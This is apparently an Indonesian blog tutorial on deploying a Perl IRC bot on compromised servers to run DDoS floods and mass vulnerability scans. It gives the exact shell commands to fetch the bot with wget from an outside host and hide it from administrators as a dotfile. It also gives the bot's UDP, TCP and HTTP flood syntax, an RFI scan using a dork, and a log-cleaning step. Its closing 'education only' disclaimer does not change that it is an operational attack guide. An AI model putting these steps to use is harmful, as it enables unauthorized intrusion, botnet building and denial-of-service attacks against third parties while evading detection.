Tutorial Buat BOT Perl, DDOS Dan MASS SCANNING VULM




Langsung aja gan bingung :D

Keterangan :

Warna MERAH artinya file-file penting
Warna Hijau artinya perintah penting
Warna Biru artinya Url penting


  • Peralatan Tempur 
1. File kambe.txt (source bot perl-nya) --> http://h1.ripway.com/newbee/kambe.txt
2. File cmd2.txt --> http://h1.ripway.com/newbee/cmd2.txt
3. File echo.txt --> http://h1.ripway.com/newbee/echo.txt
4. Browser Mozilla Firefox --> http://www.mozilla.com/en-US/firefox/
5. Mirc --> http://www.mirc.com/get.html
6. Shell (minta sama temen2 bandar shell atau di manapun itu atau keteman terdekatmu yang mempunyai shell)

Kalo smuanya sudah siap, sekarang kamu upload FILE CMD2.TXT dan FILE ECHO.TXT ke hostingan kamu.
Kalo kamu belom punya hostingan, coba register aja ke hostingan2 gratis seperti www.ripway.com,
www.geocities.com, dan lainnya.

Udah? Beneran?

Kalo 2 file tadi udah sukses dihosting, ambil linknya (alamat tempat file itu disimpan), misalnya aja linknya
http://h1.ripway.com/newbee/cmd2.txt dan http://h1.ripway.com/newbee/echo.txt. Dua link ini nanti

kamu pakai untuk langkah berikutnya.


  • Langkah berikutnya? Afaan tuch?


Langkah itu adalah memodifikasi konfigurasi FILE KAMBE.TXT kamu. Coba buka pake editor seperti notepad

misalnya. Coba kamu perhatikan bagian yang ini :

kalo ga kelihatan klik aja

Ada 7 poin yang kamu edit (yang ada di dalam tanda petik) :
1. Ganti dengan link FILE CMD2.TXT kamu tadi (http://h1.ripway.com/newbee/cmd2.txt)
2. Ganti dengan link FILE ECHO.TXT kamu tadi (http://h1.ripway.com/newbee/echo.txt)
3. Ganti dengan nick kamu di IRC, nick itu nanti yang dianggap sebagai admin bot
4. Ganti dengan nama channel IRC tempat Bot Perl nantinya join.
5. Ganti dengan nick Bot Perl-nya dengan nick yang kamu mau.
6. Ganti dengan ident dan realname Bot Perl-nya (Gak diganti juga gak apa)
7. Kalo kamu mau Bot Perl-nya masuk server selain ke dalnet, silahkan kamu ganti aja bagian ini dengan
nama server IRC yang kamu mau.
Udah keren Nick botnya? Udah gaul? Udah pas semua settingannya?
Cek lagi dech, ntar repot lagi klo ada yang salah.
Kalo bener-bener udah mantaf, langsung disimpan aja filenya, trus lanjut ke langkah berikutnya.
Langkah berikutnya? Apaan tuch?
Langkah itu adalah meng-upload FILE KAMBE.TXT tadi ke hostingan kamu yang tadi udah register. Kalo udah, ambil lagi linknya, misalnya www.ripway.com/newbee/kambe.txt.
Persiapkan link tersebut lalu kita meluncur menuju shell.
MANA SHELLNYA???

-_-! Dudul... Kan udah saya bilang tadi minta ama bandar-bandar shell-nya Yogyafree. Tuh ada om
indounderground, xshadow, inc0mp13te, dll, pada suka bagi-bagi shell gratis tuh mreka.. huehuehe :P :P
Udah dapet shellnya?
Kalo udah sekarang cari direktori yang permission-nya 777 di shell.
Caranya eksekusi perintah : find / -type d -perm 777
Kalo uda dapet, baru masuk ke tuh direktori dan jalankan perintah2 ini :

1. Transfer FILE KAMBE.TXT dari hostingan kamu tadi ke dalam shell :
wget http://h1.ripway.com/newbee/kambe.txt
Kalo wget gak bisa, coba ganti pake lwp-download :
lwp-download http://h1.ripway.com/newbee/kambe.txt
2. Ubah ekstensi FILE KAMBE.TXT jadi KAMBE.PL biar berekstensi perl dan dihidden biar filenya agak
susah ketauan ama admin target. Tanda titik di depan kambe.pl menandakan kalo file tersebut hidden :
mv kambe.txt .kambe.pl
3. Ganti permission KAMBE.PL jadi 755 biar bisa dieksekusi :
chmod 755 .kambe.pl
4. Eksekusi file KAMBE.PL :
perl .kambe.pl

Kalo gak ada pesan error waktu perintah2 di atas dijalankan, berarti pembuatan bot sukses! Tapi klo di IRC
tuh bot gak muncul2, berarti IP tuh bot dah diban sama IRC SERVER tersebut, coba aja ganti server IRC di
editan KAMBE.TXT tadi dengan server lainnya.

Untuk lebih jelas bayangannya dapat melihat gambar di dalam php shell berikut :

kalo ga kelihatan klik aja


Bot-nya dah masuk IRC?

Kalo udah, coba baca-baca dulu perintah-perintah yang ada.
Ketik ini di channel IRC :
!kambe @help
Bot akan menampilkan help seperti ini :

kalo ga kelihatan klik aja


Nah perintah dengan nama !cmd (prefix-nya) itu smua diganti dengan !kambe, baru bisa jalan
(huehuehue).
Oke, Saatnya DDOS!

Langkah-langkahnya :
1. Cari IP target atau Nama Situs target yang mau di DDOS.
2. Ada 3 Metode DDOS pada Bot ini :
- UDP Flood
Syntax Perintahnya : !kambe @udpflood <ip> <packet size> <time>
contohnya : !kambe @udpflood 212.1.3.5 9999999 9999999999999999999
- TCP Flood
Syntax Perintahnya : !kambe @tcpflood <ip> <port> <packet size> <time>
contohnya : !kambe @tcpflood 212.1.3.5 21 9999999 9999999999999999
- HTTP Flood
Syntax Perintahnya : !kambe @httpflood <site> <time>
contohnya : !kambe httpflood www.website.com 9999999999999999999999

kalo ga kelihatan klik aja


MASS SCAN VULN

Langkah-langkahnya :

1. Cari bug dan dorknya.
Misalnya aja salah satu bug exploit RFI di Milw0rm :




- bug : /ch_readalso.php?read_xml_include=
- dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"

2. Jalankan Perintah ini:

Syntax Perintahnya : !kambe @scan <exploit> <dork>
Contohnya :
!kambe @scan /ch_readalso.php?read_xml_include= "Copyrights © 2005 Belgische Federale"

3. nyemil makanan sambil nunggu hasil scan keluar :D, jangan lupa puter lagu favorit kamu ... biar gak sakit kepala mlototin monitor terus... :-P


Kalo uda slesai scan2an dan ddos2an-nya,, jangan lupa hapus log-nya, caranya ketik
:
!kambe @logcleaner

Dan masih banyak lagi fitur bot ini seperti portscan, nmap, back connect, sendmail, dll.
'Di balik dunia IRC bukan hanya sekedar untuk chatting dan ngejunk... But it could be a dangerous tool'

/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security.
Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini
adalah bukan tanggung jawab saya */

Just Sharing 






Post a Comment

0 Comments